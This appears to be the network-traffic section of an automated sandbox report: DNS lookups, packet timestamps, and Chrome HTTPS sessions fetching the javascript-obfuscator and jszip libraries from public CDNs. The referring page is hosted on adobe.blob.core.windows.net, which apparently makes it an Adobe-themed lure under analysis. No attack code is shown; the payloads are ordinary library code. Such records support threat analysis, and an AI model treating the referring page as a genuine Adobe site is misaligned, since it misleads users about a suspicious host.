                            Dec 18, 2024 01:03:11.756546021 CET8049698192.229.221.95192.168.2.16
                            Dec 18, 2024 01:03:11.756747007 CET4969880192.168.2.16192.229.221.95
                            Dec 18, 2024 01:03:16.485670090 CET49701443192.168.2.1620.190.147.1
                            Dec 18, 2024 01:03:16.605990887 CET4434970120.190.147.1192.168.2.16
                            Dec 18, 2024 01:03:16.606080055 CET49701443192.168.2.1620.190.147.1
                            TimestampSource PortDest PortSource IPDest IP
                            Dec 18, 2024 01:01:49.301843882 CET53535241.1.1.1192.168.2.16
                            Dec 18, 2024 01:01:49.309978008 CET53516401.1.1.1192.168.2.16
                            Dec 18, 2024 01:01:50.054698944 CET6252653192.168.2.161.1.1.1
                            Dec 18, 2024 01:01:52.027837038 CET5251853192.168.2.161.1.1.1
                            Dec 18, 2024 01:01:52.028284073 CET5738853192.168.2.161.1.1.1
                            Dec 18, 2024 01:01:52.031991005 CET6136253192.168.2.161.1.1.1
                            Dec 18, 2024 01:01:52.032347918 CET5384753192.168.2.161.1.1.1
                            Dec 18, 2024 01:01:52.060147047 CET53522521.1.1.1192.168.2.16
                            Dec 18, 2024 01:01:52.164793015 CET53525181.1.1.1192.168.2.16
                            Dec 18, 2024 01:01:52.165431976 CET53573881.1.1.1192.168.2.16
                            Dec 18, 2024 01:01:52.168894053 CET53613621.1.1.1192.168.2.16
                            Dec 18, 2024 01:01:52.169964075 CET53538471.1.1.1192.168.2.16
                            Dec 18, 2024 01:01:53.956070900 CET6534153192.168.2.161.1.1.1
                            Dec 18, 2024 01:01:53.956291914 CET5213953192.168.2.161.1.1.1
                            Dec 18, 2024 01:01:54.093549013 CET53653411.1.1.1192.168.2.16
                            Dec 18, 2024 01:01:54.093575001 CET53521391.1.1.1192.168.2.16
                            Dec 18, 2024 01:01:54.297106981 CET6241253192.168.2.161.1.1.1
                            Dec 18, 2024 01:01:54.297626972 CET5865653192.168.2.161.1.1.1
                            Dec 18, 2024 01:01:54.434178114 CET53624121.1.1.1192.168.2.16
                            Dec 18, 2024 01:01:54.434500933 CET53586561.1.1.1192.168.2.16
                            Dec 18, 2024 01:01:56.533437967 CET5082153192.168.2.161.1.1.1
                            Dec 18, 2024 01:01:56.533437967 CET5280253192.168.2.161.1.1.1
                            Dec 18, 2024 01:01:56.670255899 CET53508211.1.1.1192.168.2.16
                            Dec 18, 2024 01:01:56.671339989 CET53528021.1.1.1192.168.2.16
                            Dec 18, 2024 01:02:09.062869072 CET53618241.1.1.1192.168.2.16
                            Dec 18, 2024 01:02:28.172483921 CET53612071.1.1.1192.168.2.16
                            Dec 18, 2024 01:02:32.829385996 CET53531131.1.1.1192.168.2.16
                            Dec 18, 2024 01:02:39.326775074 CET138138192.168.2.16192.168.2.255
                            Dec 18, 2024 01:02:49.237771034 CET53537831.1.1.1192.168.2.16
                            Dec 18, 2024 01:02:51.183645964 CET53597821.1.1.1192.168.2.16
                            Dec 18, 2024 01:03:22.099358082 CET53515771.1.1.1192.168.2.16
                            TimestampSource IPDest IPChecksumCodeType
                            Dec 18, 2024 01:01:49.395261049 CET192.168.2.161.1.1.1c23f(Port unreachable)Destination Unreachable
                            Dec 18, 2024 01:01:57.182424068 CET192.168.2.161.1.1.1c2ba(Port unreachable)Destination Unreachable
                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Dec 18, 2024 01:01:50.054698944 CET192.168.2.161.1.1.10x8732Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                            Dec 18, 2024 01:01:52.027837038 CET192.168.2.161.1.1.10xe391Standard query (0)cdn.jsdelivr.netA (IP address)IN (0x0001)false
                            Dec 18, 2024 01:01:52.028284073 CET192.168.2.161.1.1.10x96ecStandard query (0)cdn.jsdelivr.net65IN (0x0001)false
                            Dec 18, 2024 01:01:52.031991005 CET192.168.2.161.1.1.10xb982Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                            Dec 18, 2024 01:01:52.032347918 CET192.168.2.161.1.1.10x10eeStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                            Dec 18, 2024 01:01:53.956070900 CET192.168.2.161.1.1.10x221aStandard query (0)www.google.comA (IP address)IN (0x0001)false
                            Dec 18, 2024 01:01:53.956291914 CET192.168.2.161.1.1.10x7e3eStandard query (0)www.google.com65IN (0x0001)false
                            Dec 18, 2024 01:01:54.297106981 CET192.168.2.161.1.1.10x5944Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                            Dec 18, 2024 01:01:54.297626972 CET192.168.2.161.1.1.10x5b90Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                            Dec 18, 2024 01:01:56.533437967 CET192.168.2.161.1.1.10xd951Standard query (0)cdn.jsdelivr.netA (IP address)IN (0x0001)false
                            Dec 18, 2024 01:01:56.533437967 CET192.168.2.161.1.1.10x9e20Standard query (0)cdn.jsdelivr.net65IN (0x0001)false
                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Dec 18, 2024 01:01:50.397116899 CET1.1.1.1192.168.2.160x8732No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                            Dec 18, 2024 01:01:52.164793015 CET1.1.1.1192.168.2.160xe391No error (0)cdn.jsdelivr.netjsdelivr.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                            Dec 18, 2024 01:01:52.164793015 CET1.1.1.1192.168.2.160xe391No error (0)jsdelivr.map.fastly.net151.101.129.229A (IP address)IN (0x0001)false
                            Dec 18, 2024 01:01:52.164793015 CET1.1.1.1192.168.2.160xe391No error (0)jsdelivr.map.fastly.net151.101.1.229A (IP address)IN (0x0001)false
                            Dec 18, 2024 01:01:52.164793015 CET1.1.1.1192.168.2.160xe391No error (0)jsdelivr.map.fastly.net151.101.65.229A (IP address)IN (0x0001)false
                            Dec 18, 2024 01:01:52.164793015 CET1.1.1.1192.168.2.160xe391No error (0)jsdelivr.map.fastly.net151.101.193.229A (IP address)IN (0x0001)false
                            Dec 18, 2024 01:01:52.165431976 CET1.1.1.1192.168.2.160x96ecNo error (0)cdn.jsdelivr.netjsdelivr.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                            Dec 18, 2024 01:01:52.168894053 CET1.1.1.1192.168.2.160xb982No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                            Dec 18, 2024 01:01:52.168894053 CET1.1.1.1192.168.2.160xb982No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                            Dec 18, 2024 01:01:52.169964075 CET1.1.1.1192.168.2.160x10eeNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                            Dec 18, 2024 01:01:52.197443008 CET1.1.1.1192.168.2.160x9597No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                            Dec 18, 2024 01:01:52.197443008 CET1.1.1.1192.168.2.160x9597No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                            Dec 18, 2024 01:01:54.093549013 CET1.1.1.1192.168.2.160x221aNo error (0)www.google.com172.217.19.228A (IP address)IN (0x0001)false
                            Dec 18, 2024 01:01:54.093575001 CET1.1.1.1192.168.2.160x7e3eNo error (0)www.google.com65IN (0x0001)false
                            Dec 18, 2024 01:01:54.434178114 CET1.1.1.1192.168.2.160x5944No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                            Dec 18, 2024 01:01:54.434178114 CET1.1.1.1192.168.2.160x5944No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                            Dec 18, 2024 01:01:54.434500933 CET1.1.1.1192.168.2.160x5b90No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                            Dec 18, 2024 01:01:56.670255899 CET1.1.1.1192.168.2.160xd951No error (0)cdn.jsdelivr.netjsdelivr.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                            Dec 18, 2024 01:01:56.670255899 CET1.1.1.1192.168.2.160xd951No error (0)jsdelivr.map.fastly.net151.101.1.229A (IP address)IN (0x0001)false
                            Dec 18, 2024 01:01:56.670255899 CET1.1.1.1192.168.2.160xd951No error (0)jsdelivr.map.fastly.net151.101.65.229A (IP address)IN (0x0001)false
                            Dec 18, 2024 01:01:56.670255899 CET1.1.1.1192.168.2.160xd951No error (0)jsdelivr.map.fastly.net151.101.129.229A (IP address)IN (0x0001)false
                            Dec 18, 2024 01:01:56.670255899 CET1.1.1.1192.168.2.160xd951No error (0)jsdelivr.map.fastly.net151.101.193.229A (IP address)IN (0x0001)false
                            Dec 18, 2024 01:01:56.671339989 CET1.1.1.1192.168.2.160x9e20No error (0)cdn.jsdelivr.netjsdelivr.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                            Dec 18, 2024 01:02:07.149276972 CET1.1.1.1192.168.2.160xdd71No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                            Dec 18, 2024 01:02:07.149276972 CET1.1.1.1192.168.2.160xdd71No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                            • https:
                              • cdn.jsdelivr.net
                              • cdnjs.cloudflare.com
                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.1649724151.101.129.2294437904C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-12-18 00:01:53 UTC574OUTGET /npm/javascript-obfuscator/dist/index.browser.js HTTP/1.1
                            Host: cdn.jsdelivr.net
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            sec-ch-ua-platform: "Windows"
                            Accept: */*
                            Sec-Fetch-Site: cross-site
                            Sec-Fetch-Mode: no-cors
                            Sec-Fetch-Dest: script
                            Referer: https://adobe.blob.core.windows.net/
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-12-18 00:01:53 UTC761INHTTP/1.1 200 OK
                            Connection: close
                            Content-Length: 1534944
                            Access-Control-Allow-Origin: *
                            Access-Control-Expose-Headers: *
                            Timing-Allow-Origin: *
                            Cache-Control: public, max-age=604800, s-maxage=43200
                            Cross-Origin-Resource-Policy: cross-origin
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Content-Type: application/javascript; charset=utf-8
                            X-JSD-Version: 4.1.1
                            X-JSD-Version-Type: version
                            ETag: W/"176be0-ZKd3I1MIpHM7ByqRe4LbBKMiybE"
                            Accept-Ranges: bytes
                            Age: 38847
                            Date: Wed, 18 Dec 2024 00:01:53 GMT
                            X-Served-By: cache-fra-etou8220144-FRA, cache-ewr-kewr1740028-EWR
                            X-Cache: HIT, HIT
                            Vary: Accept-Encoding
                            alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                            2024-12-18 00:01:53 UTC16384INData Raw: 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 69 6e 64 65 78 2e 62 72 6f 77 73 65 72 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 2e 4a 61 76 61 53 63 72 69 70 74 4f 62 66 75 73 63
                            Data Ascii: /*! For license information please see index.browser.js.LICENSE.txt */!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define([],t):"object"==typeof exports?exports.JavaScriptObfusc
                            2024-12-18 00:01:54 UTC16384INData Raw: 79 2c 72 26 4f 3f 52 3a 31 29 29 2c 69 7d 2c 46 6f 72 49 6e 53 74 61 74 65 6d 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 67 65 6e 65 72 61 74 65 49 74 65 72 61 74 69 6f 6e 46 6f 72 53 74 61 74 65 6d 65 6e 74 28 22 69 6e 22 2c 65 2c 74 26 4f 3f 52 3a 31 29 7d 2c 46 6f 72 4f 66 53 74 61 74 65 6d 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 67 65 6e 65 72 61 74 65 49 74 65 72 61 74 69 6f 6e 46 6f 72 53 74 61 74 65 6d 65 6e 74 28 22 6f 66 22 2c 65 2c 74 26 4f 3f 52 3a 31 29 7d 2c 4c 61 62 65 6c 65 64 53 74 61 74 65 6d 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 5b 65 2e 6c 61 62 65 6c 2e 6e 61 6d 65 2b 22 3a 22 2c 74 68 69 73 2e 6d 61 79 62
                            Data Ascii: y,r&O?R:1)),i},ForInStatement:function(e,t){return this.generateIterationForStatement("in",e,t&O?R:1)},ForOfStatement:function(e,t){return this.generateIterationForStatement("of",e,t&O?R:1)},LabeledStatement:function(e,t){return[e.label.name+":",this.mayb
                            2024-12-18 00:01:54 UTC16384INData Raw: 3d 3d 74 2e 6c 65 6e 67 74 68 26 26 28 65 2e 65 78 74 65 6e 64 65 64 52 61 6e 67 65 5b 31 5d 3d 74 5b 72 5d 2e 72 61 6e 67 65 5b 30 5d 29 2c 28 72 2d 3d 31 29 3e 3d 30 26 26 28 65 2e 65 78 74 65 6e 64 65 64 52 61 6e 67 65 5b 30 5d 3d 74 5b 72 5d 2e 72 61 6e 67 65 5b 31 5d 29 2c 65 7d 72 65 74 75 72 6e 20 72 3d 7b 41 73 73 69 67 6e 6d 65 6e 74 45 78 70 72 65 73 73 69 6f 6e 3a 22 41 73 73 69 67 6e 6d 65 6e 74 45 78 70 72 65 73 73 69 6f 6e 22 2c 41 73 73 69 67 6e 6d 65 6e 74 50 61 74 74 65 72 6e 3a 22 41 73 73 69 67 6e 6d 65 6e 74 50 61 74 74 65 72 6e 22 2c 41 72 72 61 79 45 78 70 72 65 73 73 69 6f 6e 3a 22 41 72 72 61 79 45 78 70 72 65 73 73 69 6f 6e 22 2c 41 72 72 61 79 50 61 74 74 65 72 6e 3a 22 41 72 72 61 79 50 61 74 74 65 72 6e 22 2c 41 72 72 6f 77 46
                            Data Ascii: ==t.length&&(e.extendedRange[1]=t[r].range[0]),(r-=1)>=0&&(e.extendedRange[0]=t[r].range[1]),e}return r={AssignmentExpression:"AssignmentExpression",AssignmentPattern:"AssignmentPattern",ArrayExpression:"ArrayExpression",ArrayPattern:"ArrayPattern",ArrowF
                            2024-12-18 00:01:54 UTC16384INData Raw: 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 63 75 72 72 65 6e 74 28 29 2e 74 79 70 65 7c 7c 74 68 69 73 2e 5f 5f 63 75 72 72 65 6e 74 2e 77 72 61 70 7d 2c 64 2e 70 72 6f 74 6f 74 79 70 65 2e 70 61 72 65 6e 74 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 74 2c 72 3b 66 6f 72 28 72 3d 5b 5d 2c 65 3d 31 2c 74 3d 74 68 69 73 2e 5f 5f 6c 65 61 76 65 6c 69 73 74 2e 6c 65 6e 67 74 68 3b 65 3c 74 3b 2b 2b 65 29 72 2e 70 75 73 68 28 74 68 69 73 2e 5f 5f 6c 65 61 76 65 6c 69 73 74 5b 65 5d 2e 6e 6f 64 65 29 3b 72 65 74 75 72 6e 20 72 7d 2c 64 2e 70 72 6f 74 6f 74 79 70 65 2e 63 75 72 72 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 5f 63 75 72 72 65 6e 74 2e 6e 6f 64 65 7d 2c 64 2e 70 72 6f 74 6f 74 79
                            Data Ascii: tion(){return this.current().type||this.__current.wrap},d.prototype.parents=function(){var e,t,r;for(r=[],e=1,t=this.__leavelist.length;e<t;++e)r.push(this.__leavelist[e].node);return r},d.prototype.current=function(){return this.__current.node},d.prototy
                            2024-12-18 00:01:54 UTC16384INData Raw: 70 6f 73 3d 72 2c 74 68 69 73 2e 6c 69 6e 65 53 74 61 72 74 3d 74 68 69 73 2e 69 6e 70 75 74 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 22 5c 6e 22 2c 72 2d 31 29 2b 31 2c 74 68 69 73 2e 63 75 72 4c 69 6e 65 3d 74 68 69 73 2e 69 6e 70 75 74 2e 73 6c 69 63 65 28 30 2c 74 68 69 73 2e 6c 69 6e 65 53 74 61 72 74 29 2e 73 70 6c 69 74 28 76 29 2e 6c 65 6e 67 74 68 29 3a 28 74 68 69 73 2e 70 6f 73 3d 74 68 69 73 2e 6c 69 6e 65 53 74 61 72 74 3d 30 2c 74 68 69 73 2e 63 75 72 4c 69 6e 65 3d 31 29 2c 74 68 69 73 2e 74 79 70 65 3d 53 2e 65 6f 66 2c 74 68 69 73 2e 76 61 6c 75 65 3d 6e 75 6c 6c 2c 74 68 69 73 2e 73 74 61 72 74 3d 74 68 69 73 2e 65 6e 64 3d 74 68 69 73 2e 70 6f 73 2c 74 68 69 73 2e 73 74 61 72 74 4c 6f 63 3d 74 68 69 73 2e 65 6e 64 4c 6f 63 3d 74 68 69 73
                            Data Ascii: pos=r,this.lineStart=this.input.lastIndexOf("\n",r-1)+1,this.curLine=this.input.slice(0,this.lineStart).split(v).length):(this.pos=this.lineStart=0,this.curLine=1),this.type=S.eof,this.value=null,this.start=this.end=this.pos,this.startLoc=this.endLoc=this
                            2024-12-18 00:01:54 UTC16384INData Raw: 7b 76 61 72 20 72 3d 65 2e 63 6f 6d 70 75 74 65 64 2c 6e 3d 65 2e 6b 65 79 3b 72 65 74 75 72 6e 21 72 26 26 28 22 49 64 65 6e 74 69 66 69 65 72 22 3d 3d 3d 6e 2e 74 79 70 65 26 26 6e 2e 6e 61 6d 65 3d 3d 3d 74 7c 7c 22 4c 69 74 65 72 61 6c 22 3d 3d 3d 6e 2e 74 79 70 65 26 26 6e 2e 76 61 6c 75 65 3d 3d 3d 74 29 7d 7a 2e 70 61 72 73 65 46 75 6e 63 74 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 2c 6e 2c 69 29 7b 74 68 69 73 2e 69 6e 69 74 46 75 6e 63 74 69 6f 6e 28 65 29 2c 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 65 63 6d 61 56 65 72 73 69 6f 6e 3e 3d 39 7c 7c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 65 63 6d 61 56 65 72 73 69 6f 6e 3e 3d 36 26 26 21 6e 29 26 26 28 74 68 69 73 2e 74 79 70 65 3d 3d 3d 53 2e 73 74 61 72 26 26 74 26 4a 26 26 74 68 69
                            Data Ascii: {var r=e.computed,n=e.key;return!r&&("Identifier"===n.type&&n.name===t||"Literal"===n.type&&n.value===t)}z.parseFunction=function(e,t,r,n,i){this.initFunction(e),(this.options.ecmaVersion>=9||this.options.ecmaVersion>=6&&!n)&&(this.type===S.star&&t&J&&thi
                            2024-12-18 00:01:54 UTC16384INData Raw: 53 2e 62 72 61 63 65 52 2e 75 70 64 61 74 65 43 6f 6e 74 65 78 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 31 21 3d 3d 74 68 69 73 2e 63 6f 6e 74 65 78 74 2e 6c 65 6e 67 74 68 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 63 6f 6e 74 65 78 74 2e 70 6f 70 28 29 3b 65 3d 3d 3d 6e 65 2e 62 5f 73 74 61 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 3d 74 68 69 73 2e 63 75 72 43 6f 6e 74 65 78 74 28 29 2e 74 6f 6b 65 6e 26 26 28 65 3d 74 68 69 73 2e 63 6f 6e 74 65 78 74 2e 70 6f 70 28 29 29 2c 74 68 69 73 2e 65 78 70 72 41 6c 6c 6f 77 65 64 3d 21 65 2e 69 73 45 78 70 72 7d 65 6c 73 65 20 74 68 69 73 2e 65 78 70 72 41 6c 6c 6f 77 65 64 3d 21 30 7d 2c 53 2e 62 72 61 63 65 4c 2e 75 70 64 61 74 65 43 6f 6e 74 65 78 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 69 73
                            Data Ascii: S.braceR.updateContext=function(){if(1!==this.context.length){var e=this.context.pop();e===ne.b_stat&&"function"===this.curContext().token&&(e=this.context.pop()),this.exprAllowed=!e.isExpr}else this.exprAllowed=!0},S.braceL.updateContext=function(e){this
                            2024-12-18 00:01:54 UTC16384INData Raw: 79 77 6f 72 64 7c 7c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 65 63 6d 61 56 65 72 73 69 6f 6e 3e 3d 39 26 26 74 68 69 73 2e 74 79 70 65 3d 3d 3d 53 2e 73 74 61 72 29 26 26 21 76 2e 74 65 73 74 28 74 68 69 73 2e 69 6e 70 75 74 2e 73 6c 69 63 65 28 74 68 69 73 2e 6c 61 73 74 54 6f 6b 45 6e 64 2c 74 68 69 73 2e 73 74 61 72 74 29 29 7d 2c 61 65 2e 70 61 72 73 65 4f 62 6a 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3d 74 68 69 73 2e 73 74 61 72 74 4e 6f 64 65 28 29 2c 6e 3d 21 30 2c 69 3d 7b 7d 3b 66 6f 72 28 72 2e 70 72 6f 70 65 72 74 69 65 73 3d 5b 5d 2c 74 68 69 73 2e 6e 65 78 74 28 29 3b 21 74 68 69 73 2e 65 61 74 28 53 2e 62 72 61 63 65 52 29 3b 29 7b 69 66 28 6e 29 6e 3d 21 31 3b 65 6c 73 65 20 69 66 28 74 68 69 73 2e 65 78 70 65 63 74 28
                            Data Ascii: yword||this.options.ecmaVersion>=9&&this.type===S.star)&&!v.test(this.input.slice(this.lastTokEnd,this.start))},ae.parseObj=function(e,t){var r=this.startNode(),n=!0,i={};for(r.properties=[],this.next();!this.eat(S.braceR);){if(n)n=!1;else if(this.expect(
                            2024-12-18 00:01:54 UTC16384INData Raw: 32 39 35 7c 7c 69 3e 3d 35 37 33 34 34 7c 7c 65 2b 31 3e 3d 6e 29 72 65 74 75 72 6e 20 69 3b 76 61 72 20 61 3d 72 2e 63 68 61 72 43 6f 64 65 41 74 28 65 2b 31 29 3b 72 65 74 75 72 6e 20 61 3e 3d 35 36 33 32 30 26 26 61 3c 3d 35 37 33 34 33 3f 28 69 3c 3c 31 30 29 2b 61 2d 35 36 36 31 33 38 38 38 3a 69 7d 2c 4d 65 2e 70 72 6f 74 6f 74 79 70 65 2e 6e 65 78 74 49 6e 64 65 78 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 6f 69 64 20 30 3d 3d 3d 74 26 26 28 74 3d 21 31 29 3b 76 61 72 20 72 3d 74 68 69 73 2e 73 6f 75 72 63 65 2c 6e 3d 72 2e 6c 65 6e 67 74 68 3b 69 66 28 65 3e 3d 6e 29 72 65 74 75 72 6e 20 6e 3b 76 61 72 20 69 2c 61 3d 72 2e 63 68 61 72 43 6f 64 65 41 74 28 65 29 3b 72 65 74 75 72 6e 21 74 26 26 21 74 68 69 73 2e 73 77 69 74 63 68 55 7c 7c 61
                            Data Ascii: 295||i>=57344||e+1>=n)return i;var a=r.charCodeAt(e+1);return a>=56320&&a<=57343?(i<<10)+a-56613888:i},Me.prototype.nextIndex=function(e,t){void 0===t&&(t=!1);var r=this.source,n=r.length;if(e>=n)return n;var i,a=r.charCodeAt(e);return!t&&!this.switchU||a
                            2024-12-18 00:01:54 UTC16384INData Raw: 73 2b 31 29 3b 72 65 74 75 72 6e 20 74 3d 3d 3d 65 3f 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 65 63 6d 61 56 65 72 73 69 6f 6e 3e 3d 31 32 26 26 36 31 3d 3d 3d 74 68 69 73 2e 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 74 68 69 73 2e 70 6f 73 2b 32 29 3f 74 68 69 73 2e 66 69 6e 69 73 68 4f 70 28 53 2e 61 73 73 69 67 6e 2c 33 29 3a 74 68 69 73 2e 66 69 6e 69 73 68 4f 70 28 31 32 34 3d 3d 3d 65 3f 53 2e 6c 6f 67 69 63 61 6c 4f 52 3a 53 2e 6c 6f 67 69 63 61 6c 41 4e 44 2c 32 29 3a 36 31 3d 3d 3d 74 3f 74 68 69 73 2e 66 69 6e 69 73 68 4f 70 28 53 2e 61 73 73 69 67 6e 2c 32 29 3a 74 68 69 73 2e 66 69 6e 69 73 68 4f 70 28 31 32 34 3d 3d 3d 65 3f 53 2e 62 69 74 77 69 73 65 4f 52 3a 53 2e 62 69 74 77 69 73 65 41 4e 44 2c 31 29 7d 2c 47 65 2e 72 65 61 64 54
                            Data Ascii: s+1);return t===e?this.options.ecmaVersion>=12&&61===this.input.charCodeAt(this.pos+2)?this.finishOp(S.assign,3):this.finishOp(124===e?S.logicalOR:S.logicalAND,2):61===t?this.finishOp(S.assign,2):this.finishOp(124===e?S.bitwiseOR:S.bitwiseAND,1)},Ge.readT


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1192.168.2.1649725104.17.24.144437904C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-12-18 00:01:53 UTC566OUTGET /ajax/libs/jszip/3.10.1/jszip.min.js HTTP/1.1
                            Host: cdnjs.cloudflare.com
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            sec-ch-ua-platform: "Windows"
                            Accept: */*
                            Sec-Fetch-Site: cross-site
                            Sec-Fetch-Mode: no-cors
                            Sec-Fetch-Dest: script
                            Referer: https://adobe.blob.core.windows.net/
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-12-18 00:01:53 UTC957INHTTP/1.1 200 OK
                            Date: Wed, 18 Dec 2024 00:01:53 GMT
                            Content-Type: application/javascript; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Access-Control-Allow-Origin: *
                            Cache-Control: public, max-age=30672000
                            ETag: W/"62e9bbf5-6f55"
                            Last-Modified: Wed, 03 Aug 2022 00:06:13 GMT
                            cf-cdnjs-via: cfworker/kv
                            Cross-Origin-Resource-Policy: cross-origin
                            Timing-Allow-Origin: *
                            X-Content-Type-Options: nosniff
                            CF-Cache-Status: HIT
                            Age: 1588896
                            Expires: Mon, 08 Dec 2025 00:01:53 GMT
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HBFn40PJ9SM40o7v3giS0uoWqulxaWyFduufXPpIWELDdcRHteoUY4JsDXr7MmNZTUDJDJQkbbTwNjds1n6X6JjwUF6UlESJhRSJI%2B5OjsY7gFvkJY%2Bh4ooAtdHCr38rWXSnCwEG"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                            Strict-Transport-Security: max-age=15780000
                            Server: cloudflare
                            CF-RAY: 8f3ae1865d42c328-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-12-18 00:01:53 UTC412INData Raw: 33 39 37 35 0d 0a 2f 2a 21 0a 0a 4a 53 5a 69 70 20 76 33 2e 31 30 2e 31 20 2d 20 41 20 4a 61 76 61 53 63 72 69 70 74 20 63 6c 61 73 73 20 66 6f 72 20 67 65 6e 65 72 61 74 69 6e 67 20 61 6e 64 20 72 65 61 64 69 6e 67 20 7a 69 70 20 66 69 6c 65 73 0a 3c 68 74 74 70 3a 2f 2f 73 74 75 61 72 74 6b 2e 63 6f 6d 2f 6a 73 7a 69 70 3e 0a 0a 28 63 29 20 32 30 30 39 2d 32 30 31 36 20 53 74 75 61 72 74 20 4b 6e 69 67 68 74 6c 65 79 20 3c 73 74 75 61 72 74 20 5b 61 74 5d 20 73 74 75 61 72 74 6b 2e 63 6f 6d 3e 0a 44 75 61 6c 20 6c 69 63 65 6e 63 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 20 6f 72 20 47 50 4c 76 33 2e 20 53 65 65 20 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 53 74 75 6b 2f 6a 73 7a 69 70 2f 6d 61 69
